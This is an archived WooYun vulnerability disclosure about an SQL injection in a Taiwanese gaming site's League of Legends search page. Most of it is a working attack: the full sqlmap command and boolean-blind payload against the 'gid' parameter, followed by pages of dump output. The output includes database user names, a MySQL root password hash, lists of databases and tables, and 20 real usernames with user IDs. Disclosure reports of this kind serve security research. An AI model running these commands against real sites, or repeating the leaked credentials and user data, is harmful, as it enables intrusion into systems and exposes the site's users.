当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161077

漏洞标题:台灣開心遊戲網英雄联盟站存在SQL注射漏洞(泄露22万用户信息+297万网站日志)(臺灣地區)

相关厂商:台灣開心遊戲網

漏洞作者: 路人甲

提交时间:2015-12-14 13:33

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

Hehagame開心遊戲網站是港台少數同時涵蓋網路遊戲、電子競技、PC單機、遊戲產業的遊戲媒體網站。作為一家專業性的網路遊戲媒體網站新生員,hehagame是台灣、香港領先的網路遊戲媒體,在遊戲傳播、資訊、下載及玩家互動方面,hehagame迅速篡位業界的領先地位。 目前,hehagame已經擁有完整龐大的遊戲資訊體系,提供成百上千個遊戲的資訊、下載、玩家交互等服務。作為一家遊戲資訊媒體,hehagame本著蜜蜂的精神,為遊戲族群採集豐富的遊戲資訊內容。并開拓創新的遊戲資訊人,致力於發展面向遊戲玩家的多種服務顯目,及面向遊戲業界的導航欄目,從真正意義上推動遊戲娛樂事業的發展。

详细说明:

地址:http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button=

$ python sqlmap.py -u "http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button=" -p gid --technique=B --output-dir=output --random-agent --batch --no-cast -D bezirk -T bezirk_lucky_member -C username,id,ip,game,credit,uid --dump --start 1 --stop 20


| bezirk_lucky_log            | 2978911 |
| bezirk_lucky_member         | 223553  |


Database: bezirk
Table: bezirk_lucky_member
[20 entries]
+------------+----+-----------------+------+--------+--------+
| username   | id | ip              | game | credit | uid    |
+------------+----+-----------------+------+--------+--------+
| pizime     | 1  | **.**.**.** | lol  | 437    | 126670 |
| zerg       | 2  |                 | lol  | 100    | 126673 |
| 怒痕死神       | 3  |                 | lol  | 100    | 126672 |
| 音竹         | 4  |                 | lol  | 100    | 126675 |
| flyingjojo | 5  |                 | lol  | 100    | 126674 |
| 湫狄         | 6  |                 | lol  | 100    | 126671 |
| 湫狄小子       | 7  |                 | lol  | 100    | 126676 |
| pedrosa    | 8  |                 | lol  | 100    | 126677 |
| 派屈克        | 9  |                 | lol  | 100    | 126678 |
| a9360314   | 10 |                 | lol  | 100    | 126680 |
| 八卦         | 11 |                 | lol  | 100    | 126681 |
| milk杯      | 12 |                 | lol  | 100    | 126682 |
| 客串的燒串      | 13 |                 | lol  | 100    | 126683 |
| 學哈偶這       | 14 |                 | lol  | 100    | 126684 |
| yushu0913  | 15 |                 | lol  | 100    | 126685 |
| 昊天金闕       | 16 |                 | lol  | 100    | 126686 |
| 曉風         | 17 |                 | lol  | 100    | 126687 |
| 我要變弱       | 18 |                 | lol  | 100    | 126688 |
| 淡雲         | 19 |                 | lol  | 100    | 126689 |
| 笨嘎奶茶       | 20 |                 | lol  | 100    | 126690 |
+------------+----+-----------------+------+--------+--------+

漏洞证明:

---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
current user:    'db@link#[email protected].%'
current user is DBA:    False
database management system users [2]:
[*] 'db@link#135!heha'@'192.168.0.%'
[*] 'mydbroot135'@'localhost'
database management system users password hashes:
[*] mydbroot135 [1]:
    password hash: *B41310172911FC6EECC44034656A6E88D6C34AD7
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
available databases [30]:
[*] `176app`
[*] `176discuz`
[*] `176ucenter`
[*] `17heha_uchome`
[*] `17hehacom_ucenter`
[*] author
[*] author_tw
[*] bezirk
[*] fans
[*] hehacms
[*] hehacms_tw
[*] hehagame
[*] hehagame_ucenter
[*] hehahk
[*] hehashop
[*] hkbbs
[*] information_schema
[*] mysql
[*] oauth2
[*] pai_db
[*] paitw_db
[*] performance_schema
[*] picqueue
[*] stats
[*] tmp1
[*] twbbs
[*] uc_home
[*] uc_multigroup
[*] urllib
[*] weblogin
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
current database:    'bezirk'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
Database: bezirk
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| bezirk_lucky_log            | 2978911 |
| bezirk_lol_sthits           | 1583445 |
| bezirk_lucky_invite         | 1163717 |
| bezirk_lucky_sign           | 858964  |
| bezirk_lucky_virproductitem | 329523  |
| bezirk_lucky_member         | 223553  |
| bezirk_full_search          | 152545  |
| bezirk_archives             | 145870  |
| bezirk_addonarticle         | 143118  |
| bezirk_ldj_sk_effect        | 126542  |
| bezirk_tos_summoner         | 95653   |
| bezirk_tos_faq_trends       | 76828   |
| bezirk_feedback             | 74070   |
| bezirk_lucky_email          | 68968   |
| bezirk_archives_old         | 54367   |
| bezirk_feeling              | 50803   |
| bezirk_tos_sumsd            | 50078   |
| bezirk_tos_faq_user         | 47094   |
| bezirk_uploads              | 44164   |
| bezirk_tos_faq_hd           | 38050   |
| bezirk_arctype              | 26571   |
| bezirk_tos_Christmas2013    | 23274   |
| bezirk_lol_count            | 22399   |
| bezirk_cache_feedbackurl    | 21337   |
| bezirk_tos_faq_tw           | 20842   |
| bezirk_feedbackrole         | 20338   |
| bezirk_west_log             | 18952   |
| bezirk_jx3_equip            | 17741   |
| bezirk_jx3_item             | 15344   |
| bezirk_arctype_bak          | 15177   |
| bezirk_jx3_npc              | 13222   |
| bezirk_lol_gonglue_content  | 12370   |
| bezirk_lol_gonglue_content2 | 9309    |
| bezirk_west_sign            | 8337    |
| bezirk_share                | 8175    |
| bezirk_tos_faq_comment      | 7341    |
| bezirk_tos176_custom_detail | 6849    |
| bezirk_tos_team             | 6439    |
| bezirk_jx3_task             | 5036    |
| bezirk_search_keywords      | 4471    |
| bezirk_west_virproductitem  | 3154    |
| bezirk_tos_tjstory          | 3151    |
| bezirk_west_member          | 2854    |
| bezirk_addonimages          | 2753    |
| bezirk_west_invite          | 2196    |
| bezirk_lol_gonglue          | 2130    |
| bezirk_gd_wq_cl_info        | 2025    |
| bezirk_ff_item              | 1964    |
| bezirk_tag_list             | 1940    |
| bezirk_ldj_answer           | 1914    |
| bezirk_tos_tj_error         | 1766    |
| bezirk_qqxy_question        | 1680    |
| bezirk_skyskill             | 1607    |
| d3_game_goods               | 1526    |
| bezirk_chinajoy_pic         | 1348    |
| bezirk_ff_skill             | 1324    |
| bezirk_ff_npc               | 1277    |
| bezirk_lol_heroskin         | 1269    |
| bezirk_lol_heroskin_bak     | 1269    |
| bezirk_rift_skill           | 1253    |
| bezirk_sy_answer            | 1233    |
| bezirk_lol_gonglue2         | 1225    |
| bezirk_gd_zb                | 1198    |
| bezirk_heroes_skill         | 1196    |
| bezirk_ldj_sk_attr          | 1163    |
| bezirk_ldj_skills           | 1163    |
| bezirk_tos_tj               | 1115    |
| bezirk_gd_zb_hk             | 1068    |
| d3_dissolution              | 1047    |
| bezirk_gd_zb_hk_bak         | 997     |
| bezirk_gd_zb_gw_info        | 989     |
| bezirk_gd_zb_gw_info_hk     | 989     |
| bezirk_west_email           | 965     |
| bezirk_mh_zhuangbei         | 919     |
| bezirk_mh_zhuangbei_attr    | 919     |
| d3_goods_img                | 905     |
| bezirk_gd_wq_cl             | 902     |
| bezirk_gd_zb_gw             | 900     |
| bezirk_gd_zb_gw_hk          | 882     |
| bezirk_mh_cailiao           | 831     |
| bezirk_mh_cailiao_attr      | 831     |
| bezirk_tos_gktype           | 800     |
| d3_monster                  | 764     |
| d3_artisan_mate             | 758     |
| bezirk_ma_kp                | 750     |
| bezirk_gd_zb_gw_hk_bak      | 746     |
| tera_skill                  | 719     |
| bezirk_gd_wq_cl_hk          | 702     |
| bezirk_skill                | 677     |
| bezirk_jx3_answer           | 641     |
| bezirk_lol_hero_abilitie    | 640     |
| bezirk_tos176_copies_custom | 623     |
| bezirk_tos176_custom        | 623     |
| bezirk_ff_achievement       | 581     |
| d3_skill_ext                | 565     |
| hs_cardinfo                 | 518     |
| bezirk_tag_index            | 494     |
| bezirk_ff_npcdhxx           | 450     |
| bezirk_ff_quest             | 440     |
| bezirk_gd_wq                | 422     |
| bezirk_gd_wq_hk             | 421     |
| bezirk_jx3_skill            | 402     |
| bezirk_ts_wj                | 398     |
| bezirk_lucky_product        | 356     |
| bezirk_dota_skill           | 349     |
| d3_artisan_proc             | 323     |
| d3_artisan_recipe           | 323     |
| bezirk_ff_category          | 291     |
| bezirk_tos176_copies        | 272     |
| bezirk_facebook             | 255     |
| bezirk_facebook_addon       | 255     |
| bezirk_mh_fmjuanzhou        | 254     |
| bezirk_mh_fmjuanzhou_attr   | 254     |
| bezirk_gd_cw                | 246     |
| bezirk_jx3_resource         | 242     |
| bezirk_gd_cw_hk             | 241     |
| bezirk_mh_consumables       | 226     |
| bezirk_mh_consumables_attr  | 226     |
| bezirk_Pandoraskill         | 213     |
| bezirk_ts_wjskill           | 213     |
| bezirk_lol_hero_item        | 204     |
| bezirk_keywords             | 196     |
| bezirk_ldj_sk_link          | 195     |
| d3_skill                    | 188     |
| bezirk_gd_zb_tz             | 180     |
| d3_npc                      | 168     |
| bezirk_jx3_allclass         | 155     |
| bezirk_gd_zb_tz_hk          | 154     |
| bezirk_tos176_mskill        | 154     |
| tera_skill_seleresult       | 152     |
| bezirk_gd_zb_tz_hk_bak      | 144     |
| bezirk_digg                 | 138     |
| bezirk_ma_kpcombo           | 138     |
| bezirk_dota_item            | 136     |
| bezirk_lol_herocz           | 129     |
| bezirk_lol_hero17173        | 128     |
| bezirk_gd_fw                | 121     |
| bezirk_gd_fw_hk             | 121     |
| bezirk_sysconfig            | 119     |
| bezirk_chinajoy_album       | 115     |
| bezirk_gd_sq                | 103     |
| bezirk_gd_sq_hk             | 101     |
| bezirk_sgsio_hero           | 100     |
| bezirk_tos_gkdrskill        | 99      |
| bezirk_jx3_zone             | 90      |
| bezirk_dota_hero            | 88      |
| bezirk_dota_hero1           | 87      |
| bezirk_lol_heroall          | 85      |
| bezirk_grade                | 80      |
| bezirk_gl_wq_cl_info        | 74      |
| bezirk_mh_shop              | 73      |
| bezirk_ff_fjnl              | 72      |
| bezirk_tos_teamskill        | 63      |
| bezirk_ff_qh                | 62      |
| bezirk_gl_wq_cl             | 61      |
| bezirk_jx3_taskclass        | 53      |
| d3_goods_cat                | 50      |
| bezirk_album_pic            | 46      |
| bezirk_heroes_tj            | 36      |
| bezirk_admin_bak            | 30      |
| bezirk_gl_wq                | 27      |
| bezirk_jx3_repute           | 26      |
| bezirk_lol_vote             | 25      |
| bezirk_ff_pet               | 21      |
| bezirk_admin                | 18      |
| bezirk_dota_merchant        | 14      |
| bezirk_tos176_act           | 14      |
| bezirk_gl_zb_gw             | 13      |
| bezirk_plus                 | 13      |
| bezirk_member_time          | 12      |
| bezirk_jx3_npcclass         | 11      |
| bezirk_channeltype          | 10      |
| bezirk_tos176_pic           | 9       |
| bezirk_flinktype            | 8       |
| bezirk_west_product         | 8       |
| tera_role                   | 8       |
| bezirk_admintype            | 7       |
| bezirk_album                | 6       |
| bezirk_arcrank              | 6       |
| tera_skill_cat              | 6       |
| bezirk_album_classify       | 5       |
| bezirk_arcatt               | 5       |
| bezirk_scores               | 5       |
| d3_role                     | 5       |
| bezirk_modules              | 3       |
| bezirk_syspassport          | 3       |
| tos_android_ads             | 3       |
| bezirk_archives2            | 2       |
| bezirk_homepageset          | 2       |
| bezirk_keyword_color        | 2       |
| bezirk_softconfig           | 2       |
| bezirk_addonrcyy            | 1       |
| bezirk_arccache             | 1       |
| bezirk_arccache_full        | 1       |
| bezirk_co_exrule            | 1       |
| bezirk_flink                | 1       |
| bezirk_lol_hehaggdown       | 1       |
| bezirk_myad                 | 1       |
| bezirk_sgpage               | 1       |
| bezirk_task                 | 1       |
| bezirk_vote                 | 1       |
| tos_ios_ads                 | 1       |
+-----------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
Database: bezirk
Table: bezirk_lucky_member
[7 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| credit   | int(10) unsigned |
| game     | char(10)         |
| id       | int(10) unsigned |
| ip       | char(15)         |
| role     | varchar(30)      |
| uid      | int(10) unsigned |
| username | varchar(30)      |
+----------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL 5
Database: bezirk
Table: bezirk_lucky_member
[20 entries]
+------------+----+-----------------+------+--------+--------+
| username   | id | ip              | game | credit | uid    |
+------------+----+-----------------+------+--------+--------+
| pizime     | 1  | **.**.**.** | lol  | 437    | 126670 |
| zerg       | 2  |                 | lol  | 100    | 126673 |
| 怒痕死神       | 3  |                 | lol  | 100    | 126672 |
| 音竹         | 4  |                 | lol  | 100    | 126675 |
| flyingjojo | 5  |                 | lol  | 100    | 126674 |
| 湫狄         | 6  |                 | lol  | 100    | 126671 |
| 湫狄小子       | 7  |                 | lol  | 100    | 126676 |
| pedrosa    | 8  |                 | lol  | 100    | 126677 |
| 派屈克        | 9  |                 | lol  | 100    | 126678 |
| a9360314   | 10 |                 | lol  | 100    | 126680 |
| 八卦         | 11 |                 | lol  | 100    | 126681 |
| milk杯      | 12 |                 | lol  | 100    | 126682 |
| 客串的燒串      | 13 |                 | lol  | 100    | 126683 |
| 學哈偶這       | 14 |                 | lol  | 100    | 126684 |
| yushu0913  | 15 |                 | lol  | 100    | 126685 |
| 昊天金闕       | 16 |                 | lol  | 100    | 126686 |
| 曉風         | 17 |                 | lol  | 100    | 126687 |
| 我要變弱       | 18 |                 | lol  | 100    | 126688 |
| 淡雲         | 19 |                 | lol  | 100    | 126689 |
| 笨嘎奶茶       | 20 |                 | lol  | 100    | 126690 |
+------------+----+-----------------+------+--------+--------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-15 23:31

厂商回复:

感謝通報

最新状态:

暂无